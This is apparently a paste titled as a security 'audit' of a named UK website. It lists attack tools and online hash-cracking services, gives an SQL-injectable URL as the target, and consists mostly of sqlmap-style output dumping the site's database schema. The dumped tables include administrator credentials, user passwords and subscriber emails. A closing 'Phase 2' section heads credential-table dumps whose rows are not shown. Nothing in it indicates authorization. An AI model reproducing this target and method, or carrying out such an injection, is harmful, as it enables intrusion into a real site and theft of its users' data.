CyberVX

Audit [abslatin]

Mar 29th, 2019
  1. Auditor: CyberVX
  2.  
  3. - OS:
  4. # Kali Linux;
  5.  
  6. - TOOLS:
  7. # NMAP;
  8. # SQLMAP WITH HASH DECRYPTER DEFAULT METHOD WITH SUFFIX;
  9. # MACCHANGER;
  10. # XPROBE2;
  11. # JOHN THE RIPPER;
  12. # JSQL;
  13. # VPN BOOK;
  14.  
  15. TOOLS SUPPORT:
  16. # https://hashkiller.co.uk/md5-decrypter.aspx
  17. # http://techcens.com/admin-page-finder-online/
  18. # https://crackstation.net/
  19. # https://www.onlinehashcrack.com/
  20. # https://hashkiller.co.uk/md5-decrypter.aspx
  21.  
  22. - VULNERABILITY:
  23. # SQL INJECTION;
  24. # INSECURE CRYPTOGRAPHIC STORAGE;
  25. # FAILURE TO RESTRICT URL ACCESS;
  26.  
  27. - TARGET:
  28. # http://www.abslatin.co.uk
  29. # http://www.abslatin.co.uk/node.php?id=16
  30.  
  31. ========================
  32. REPORT 1
  33. ========================
  34.  
  35. Database: db312892314
  36. Table: album
  37. [3 columns]
  38. +------------+--------------+
  39. | Column | Type |
  40. +------------+--------------+
  41. | IdAlbum | int(11) |
  42. | ImageAlbum | varchar(200) |
  43. | NameAlbum | varchar(300) |
  44. +------------+--------------+
  45.  
  46. Database: db312892314
  47. Table: p_suscriptors
  48. [4 columns]
  49. +----------------+--------------+
  50. | Column | Type |
  51. +----------------+--------------+
  52. | IdSuscriptor | int(11) |
  53. | MailSuscriptor | varchar(300) |
  54. | Name | varchar(100) |
  55. | Nationality | varchar(100) |
  56. +----------------+--------------+
  57.  
  58. Database: db312892314
  59. Table: p_album
  60. [3 columns]
  61. +------------+--------------+
  62. | Column | Type |
  63. +------------+--------------+
  64. | IdAlbum | int(11) |
  65. | ImageAlbum | varchar(200) |
  66. | NameAlbum | varchar(300) |
  67. +------------+--------------+
  68.  
  69. Database: db312892314
  70. Table: p_links
  71. [4 columns]
  72. +-------------+---------------+
  73. | Column | Type |
  74. +-------------+---------------+
  75. | CommentLink | varchar(1000) |
  76. | IdLink | int(11) |
  77. | NameLink | varchar(200) |
  78. | URL | varchar(500) |
  79. +-------------+---------------+
  80.  
  81. Database: db312892314
  82. Table: links
  83. [4 columns]
  84. +-------------+---------------+
  85. | Column | Type |
  86. +-------------+---------------+
  87. | CommentLink | varchar(1000) |
  88. | IdLink | int(11) |
  89. | NameLink | varchar(200) |
  90. | URL | varchar(500) |
  91. +-------------+---------------+
  92.  
  93. Database: db312892314
  94. Table: p_events
  95. [10 columns]
  96. +-----------------+--------------+
  97. | Column | Type |
  98. +-----------------+--------------+
  99. | DateEvent | datetime |
  100. | FeaturesEvent | longtext |
  101. | FinishTimeEvent | time |
  102. | FrontPage | int(11) |
  103. | Hidden | int(11) |
  104. | IdEvent | int(11) |
  105. | ImageMin | varchar(200) |
  106. | NameEvent | varchar(500) |
  107. | PlaceEvent | varchar(500) |
  108. | StartTimeEvent | time |
  109. +-----------------+--------------+
  110.  
  111. Database: db312892314
  112. Table: p_salsa
  113. [6 columns]
  114. +------------+--------------+
  115. | Column | Type |
  116. +------------+--------------+
  117. | Content | blob |
  118. | DateTime | datetime |
  119. | IdSalsa | int(11) |
  120. | Image | varchar(200) |
  121. | PreContent | varchar(500) |
  122. | TitleSalsa | varchar(100) |
  123. +------------+--------------+
  124.  
  125. Database: db312892314
  126. Table: p_news
  127. [8 columns]
  128. +------------+--------------+
  129. | Column | Type |
  130. +------------+--------------+
  131. | Content | text |
  132. | DateTime | datetime |
  133. | FrontPage | int(11) |
  134. | Hidden | int(11) |
  135. | IdNew | int(11) |
  136. | ImageMin | varchar(200) |
  137. | PreContent | varchar(500) |
  138. | TitleNew | varchar(500) |
  139. +------------+--------------+
  140.  
  141. Database: db312892314
  142. Table: gallery
  143. [5 columns]
  144. +------------+--------------+
  145. | Column | Type |
  146. +------------+--------------+
  147. | footprint | varchar(200) |
  148. | IdAlbum | int(11) |
  149. | IdPhoto | int(11) |
  150. | ImageMin | varchar(200) |
  151. | ImageWhole | varchar(200) |
  152. +------------+--------------+
  153.  
  154. Database: db312892314
  155. Table: administrators
  156. [3 columns]
  157. +---------------+--------------+
  158. | Column | Type |
  159. +---------------+--------------+
  160. | id | int(11) |
  161. | user_name | varchar(255) |
  162. | user_password | varchar(60) |
  163. +---------------+--------------+
  164.  
  165. Database: db312892314
  166. Table: p_gallery
  167. [5 columns]
  168. +------------+--------------+
  169. | Column | Type |
  170. +------------+--------------+
  171. | footprint | varchar(200) |
  172. | IdAlbum | int(11) |
  173. | IdPhoto | int(11) |
  174. | ImageMin | varchar(200) |
  175. | ImageWhole | varchar(200) |
  176. +------------+--------------+
  177.  
  178. Database: db312892314
  179. Table: events
  180. [10 columns]
  181. +-----------------+--------------+
  182. | Column | Type |
  183. +-----------------+--------------+
  184. | DateEvent | date |
  185. | FeaturesEvent | text |
  186. | FinishTimeEvent | time |
  187. | FrontPage | tinyint(1) |
  188. | Hidden | tinyint(1) |
  189. | IdEvent | int(11) |
  190. | ImageMin | varchar(200) |
  191. | NameEvent | varchar(500) |
  192. | PlaceEvent | varchar(500) |
  193. | StartTimeEvent | time |
  194. +-----------------+--------------+
  195.  
  196. Database: db312892314
  197. Table: suscriptors
  198. [4 columns]
  199. +----------------+--------------+
  200. | Column | Type |
  201. +----------------+--------------+
  202. | IdSuscriptor | int(11) |
  203. | MailSuscriptor | varchar(300) |
  204. | Name | varchar(100) |
  205. | Nationality | varchar(100) |
  206. +----------------+--------------+
  207.  
  208. Database: db312892314
  209. Table: videos
  210. [3 columns]
  211. +------------+---------------+
  212. | Column | Type |
  213. +------------+---------------+
  214. | IdVideo | int(11) |
  215. | TitleVideo | varchar(500) |
  216. | URLVideo | varchar(1000) |
  217. +------------+---------------+
  218.  
  219. Database: db312892314
  220. Table: news
  221. [8 columns]
  222. +------------+--------------+
  223. | Column | Type |
  224. +------------+--------------+
  225. | Content | text |
  226. | DateTime | datetime |
  227. | FrontPage | tinyint(1) |
  228. | Hidden | tinyint(1) |
  229. | IdNew | int(11) |
  230. | ImageMin | varchar(200) |
  231. | PreContent | varchar(500) |
  232. | TitleNew | varchar(500) |
  233. +------------+--------------+
  234.  
  235. Database: db312892314
  236. Table: salsa
  237. [6 columns]
  238. +------------+--------------+
  239. | Column | Type |
  240. +------------+--------------+
  241. | Content | blob |
  242. | DateTime | datetime |
  243. | IdSalsa | int(11) |
  244. | Image | varchar(200) |
  245. | PreContent | varchar(500) |
  246. | TitleSalsa | varchar(100) |
  247. +------------+--------------+
  248.  
  249. Database: db312892314
  250. Table: p_categories
  251. [2 columns]
  252. +--------------+--------------+
  253. | Column | Type |
  254. +--------------+--------------+
  255. | IdCategory | int(11) |
  256. | NameCategory | varchar(200) |
  257. +--------------+--------------+
  258.  
  259. Database: db312892314
  260. Table: p_videos
  261. [3 columns]
  262. +------------+--------------+
  263. | Column | Type |
  264. +------------+--------------+
  265. | IdVideo | int(11) |
  266. | TitleVideo | varchar(100) |
  267. | URLVideo | varchar(500) |
  268. +------------+--------------+
  269.  
  270. Database: db312892314
  271. Table: p_products
  272. [11 columns]
  273. +-------------+--------------+
  274. | Column | Type |
  275. +-------------+--------------+
  276. | DateTime | datetime |
  277. | Features | varchar(500) |
  278. | FrontPage | int(11) |
  279. | Hidden | int(11) |
  280. | IdCategory | int(11) |
  281. | IdProduct | int(11) |
  282. | ImageMin | varchar(200) |
  283. | ImageWhole | varchar(200) |
  284. | NameProduct | varchar(100) |
  285. | Price | double |
  286. | Stock | int(11) |
  287. +-------------+--------------+
  288.  
  289. Database: db312892314
  290. Table: p_users
  291. [3 columns]
  292. +--------------+--------------+
  293. | Column | Type |
  294. +--------------+--------------+
  295. | IdUser | varchar(50) |
  296. | NameUser | varchar(100) |
  297. | PasswordUser | varchar(50) |
  298. +--------------+--------------+
  299.  
  300. Database: db312892314
  301. Table: users
  302. [3 columns]
  303. +--------------+--------------+
  304. | Column | Type |
  305. +--------------+--------------+
  306. | IdUser | varchar(50) |
  307. | NameUser | varchar(100) |
  308. | PasswordUser | varchar(50) |
  309. +--------------+--------------+
  310.  
  311. ===============================================================
  312. PHASE 2:
  313.  
  314. Database: db312892314
  315. Table: administrators
  316. [3 entries]
  324.  
  325. Database: db312892314
  326. Table: p_users
  327. [3 entries]
  335.  
  336. Database: db312892314
  337. Table: users
  338. [2 entries]